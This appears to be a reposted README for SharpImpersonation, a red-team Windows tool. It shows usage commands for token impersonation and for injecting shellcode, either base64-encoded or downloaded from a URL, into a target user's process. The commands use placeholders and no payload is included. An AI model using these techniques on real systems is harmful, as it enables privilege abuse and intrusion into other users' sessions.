SharpImpersonation – A User Impersonation Tool – Via Token Or Shellcode Injection

SharpImpersonation 1 List

This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

  • https://github.com/0xbadjuju/Tokenvator

A blog post for the intruduction can be found here:

  • https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

List user processes

PS > PS C:temp> SharpImpersonation.exe list

SharpImpersonation 1 List

List only elevated processes

PS > PS C:temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:temp> SharpImpersonation.exe user:<user> binary:<binary-Path>
SharpImpersonation 2 CreateProcessWithTokenW

Inject base64 encoded shellcode into the first process of the target user

PS > PS C:temp> SharpImpersonation.exe user:<user> shellcode:<base64shellcode>
SharpImpersonation 3 ShellcodeBase64

Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:temp> SharpImpersonation.exe user:<user> shellcode:<URL>
SharpImpersonation 4 ShellcodeWebDownload

Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:temp> SharpImpersonation.exe user:<user> technique:ImpersonateLoggedOnuser
SharpImpersonation 5 ImpersonateLoggedOnUser

Download SharpImpersonation

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

Discord

Original Source